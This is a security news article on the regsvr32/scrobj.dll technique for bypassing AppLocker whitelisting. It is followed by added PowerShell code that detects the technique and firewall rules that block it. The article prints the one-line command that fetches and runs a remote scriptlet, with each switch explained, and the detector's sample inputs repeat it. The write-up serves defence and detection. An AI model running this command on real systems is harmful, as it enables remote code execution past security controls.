Regsvr32 is whitelisted, seen as an essential system function

A researcher in Colorado has discovered a feature in Regsvr32 that allows an attacker to bypass application whitelisting protections, such as those afforded by Microsoft's AppLocker. If the technique is used, there's little evidence left behind for investigators, as the process doesn't alter the system registry and in some cases comes across as normal Internet Explorer traffic.

Casey Smith, a researcher in Colorado, needed to install a reverse shell, but the workstation in question was locked down by AppLocker and script rules. After some trial and error, he discovered an interesting solution:

    regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

The switches are regsvr32's own: /s runs silently, /n skips the DllRegisterServer call, /u requests an unregister, and /i: passes the string that follows it (here a URL) to the DLL's DllInstall export. The DLL named on the command line, scrobj.dll, is the Windows scriptlet component, which fetches the scriptlet from that location and runs it.

"The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed it, a signed, default MS binary. So, all you need to do is host your .sct file at a location you control," Smith wrote.

Up until this week, few people, if any, knew that Regsvr32 could accept a URL for a script. This makes for some interesting developments, because all an attacker has to do is place the code block (VBScript or JScript) inside the registration element of the scriptlet. Smith published several proof-of-concept scripts, which other researchers confirmed work as expected.

If used, this command will make Red Team engagements a bit easier, and the same can be said about criminal attacks. It's certainly a neat trick. As Smith wrote, it doesn't alter the registry, it doesn't require administrative privileges, and the scripts can be called over HTTP or HTTPS.

Salted Hash has reached out to Microsoft for comment, and we'll update this story if they choose to respond.

"Please note, the exploit described does not make any changes to the registry; monitoring of registry entries will not be effective," wrote an information security consultant in Southern California who goes by the handle Munin.

Regsvr32 is whitelisted, seen as an essential system function.
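As an added example, not part of the original article or of Smith's published proof-of-concept code, the PowerShell check below flags process command lines that match the pattern above: regsvr32 invoked with a remote location in its /i: argument together with scrobj.dll. It deliberately does not look for a ".sct" suffix, since the scriptlet can be served under any name, and it covers both the 64-bit and 32-bit binaries, which are both called regsvr32.exe. The function name and the sample command lines are constructed for illustration; the input is assumed to be the CommandLine field of a process-creation record (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled).

```powershell
# Added example: detect regsvr32 loading a scriptlet from a remote location.
# Names and sample data are constructed for illustration, not taken from real telemetry.

function Test-RegsvrRemoteScriptlet {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Only look at regsvr32 itself. Both the 64-bit (System32) and 32-bit
    # (SysWOW64) builds are named regsvr32.exe, so the file name is enough.
    if ($CommandLine -notmatch '(^|[\\/"\s])regsvr32(\.exe)?("|\s)') { return $false }

    # /i: (or -i:) carries the install string handed to DllInstall. Key on a
    # remote location there, not on a ".sct" suffix: any extension works.
    $m = [regex]::Match($CommandLine, '(?i)[/-]i:"?(?<target>[^\s"]+)')
    if (-not $m.Success) { return $false }
    $target = $m.Groups['target'].Value
    # http(s)/ftp URLs, plus UNC paths, which are treated as remote here (assumption).
    $remote = $target -match '^(https?://|ftp://|\\\\)'

    # scrobj.dll is the scriptlet COM handler that fetches and runs the script.
    $scrobj = $CommandLine -match 'scrobj\.dll'

    return [bool]($remote -and $scrobj)
}

# Constructed sample command lines (not real telemetry).
$samples = @(
    'regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll',                        # the published form
    'regsvr32.exe /s /n /u /i:https://server/update scrobj.dll',                     # no .sct extension at all
    '"C:\Windows\SysWOW64\regsvr32.exe" /s /u /i:http://server/x.txt scrobj.dll',    # 32-bit copy, other extension
    'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"',                              # ordinary DLL registration
    'regsvr32 /s /n /u /i:C:\tools\local.sct scrobj.dll'                             # local scriptlet: no network fetch
)

foreach ($line in $samples) {
    '{0,-5} {1}' -f (Test-RegsvrRemoteScriptlet $line), $line
}
```

The first three samples are flagged and the last two are not. The local-file case is left alone on purpose: the check is meant to catch the network-aware variant the article describes, and a scriptlet already on disk is a job for AppLocker's DLL rules or the Device Guard script enforcement mentioned further down rather than for command-line matching.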
The problem is the un-sandboxed feature and network awareness, which is why it can accept URLs (external or local). "Kind of like early Web browsers, when JavaScript first came out," Munin explained to Salted Hash.

Munin said that a possible indicator of compromise could exist, as .sct files loaded onto the system might be found in the "Temporary Internet Files" folder.

There is no patch available, but Munin suggests blocking Regsvr32.exe with Windows Firewall, which removes the network awareness. For full effectiveness both copies of the binary have to be blocked: there is no Regsvr64.exe, but on 64-bit Windows the 64-bit regsvr32.exe lives in System32 and a 32-bit regsvr32.exe in SysWOW64.

Other researchers have said that Device Guard, fully enabled with script protection, will block this bypass as well, but that would require the organization to have Windows 10 Enterprise and Hyper-V on the system in question.

"This is a very severe vulnerability, as it allows for arbitrary code execution by a trusted program, and should be mitigated as soon as possible," Munin said.

Update: Several readers have emailed (in addition to the comment below) to say that .sct files shouldn't be used as an indicator, as any file extension will work. Detection therefore has to rest on the regsvr32 command line itself (a URL in the /i: argument alongside scrobj.dll) and on network connections made by regsvr32.exe, not on file names. This will make investigations all the more difficult until Microsoft does something about this function.
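The firewall mitigation Munin suggests, written out as an added example that is not from the article: two Windows Firewall block rules, one per copy of regsvr32.exe, created with the built-in NetSecurity cmdlets. The rule names are my own; the paths assume a standard 64-bit Windows install and the script must run from an elevated prompt. Because Windows Firewall's default outbound policy is allow and block rules take precedence, no change to the default policy is needed.

```powershell
# Added example: block outbound network access for both regsvr32.exe builds.
# Rule names are illustrative; run elevated. Requires the NetSecurity module
# (Windows 8 / Server 2012 and later).

$targets = @{
    'Block outbound - regsvr32 (System32)' = "$env:SystemRoot\System32\regsvr32.exe"   # 64-bit build
    'Block outbound - regsvr32 (SysWOW64)' = "$env:SystemRoot\SysWOW64\regsvr32.exe"   # 32-bit build
}

foreach ($name in $targets.Keys) {
    # Idempotent: skip rules that already exist so re-running does not duplicate them.
    if (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue) { continue }

    New-NetFirewallRule -DisplayName $name `
        -Direction Outbound -Action Block -Profile Any -Enabled True `
        -Program $targets[$name] | Out-Null
}

# Show what is now in place; both rules should read Outbound / Block / True.
Get-NetFirewallRule -DisplayName 'Block outbound - regsvr32*' |
    Format-Table DisplayName, Direction, Action, Enabled -AutoSize
```

With the rules active, the published command fails at the fetch step because regsvr32.exe can no longer reach the server. The rules do nothing against a scriptlet that is already on the local disk, which is why the article pairs the firewall suggestion with Device Guard script protection rather than offering it as a complete fix.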